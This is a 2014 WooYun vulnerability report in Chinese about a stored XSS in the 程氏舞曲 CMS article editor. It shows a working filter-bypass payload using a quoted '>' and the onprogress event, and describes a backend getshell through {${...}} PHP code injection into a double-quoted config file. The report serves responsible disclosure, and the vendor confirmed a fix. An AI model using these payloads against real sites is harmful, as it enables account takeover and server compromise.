当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067967

漏洞标题:程氏舞曲CMS储存型 xss(6) 附后台getshell

相关厂商:chshcms.com

漏洞作者: roker

提交时间:2014-07-18 11:09

修复时间:2014-10-16 11:10

公开时间:2014-10-16 11:10

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-18: 厂商已经确认,细节仅向厂商公开
2014-07-21: 细节向第三方安全合作伙伴开放
2014-09-11: 细节向核心白帽子及相关领域专家公开
2014-09-21: 细节向普通白帽子公开
2014-10-01: 细节向实习白帽子公开
2014-10-16: 细节向公众公开

简要描述:

大概这是最后一次 提交这个cms的xss了。。

详细说明:

黑盒几分钟就出来了。。
发表文章处。
先提交一段测试代码。

<img src=x/onerror=x>onerror onxxxx<img src=x onxxxx=><x xx onxxxx=x>


发现 结果只剩下了 onxxxx。
那么 其机制大概是这样的。

先过滤掉 onerror之类的危险字符串。再将 <>标签内的onxxx给过滤掉


上次我是这样绕过的 WooYun: 程氏舞曲储存型xss (4) #2处xss
如果我换成 ' 包裹住 > 会怎样呢?
提交 <img src=x ='>' onxxxx=>。 这下没过滤了。剩下的就是找个没有在白名单里的 事件了。
像这样 alert

<video src="xxx.xxx.xxx/a"a='>' onprogress=alert(1)>


22.jpg


(该事件测试于 谷歌浏览器)
后台getshell就很简单了,
看到/csdj/lib/Cs_Config.php的代码

<?php
define("Web_Name","程氏CMS3.5"); //站点名称
define("Web_Url","localhost"); //站点域名
define("Web_Path","/"); //站点路径
define("Admin_Code","aaaaaa"); //后台验证码
define("Admin_Url",""); //后台访问域名,留空为取消
define("Web_Off",0); //网站开关
define("Web_Onneir","网站升级中..."); //网站关闭内容
define("Web_Mode",1); //网站运行模式
define("Html_Wjt",".htaccess"); //伪静态模式
define("Html_Index","index.html"); //主
.............

双引号,所以可以通过
{${phpinfo()}}这种格式直接执行php代码.

2.jpg


6.jpg

触发xss后可以利用js提交数据getshell 此前已有实例 就不写js代码了

漏洞证明:

如上所述

修复方案:

加强过滤 :)

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-18 11:27

厂商回复:

经过确定,漏洞确实存在,
已经修复,感谢您的检测~!

最新状态:

暂无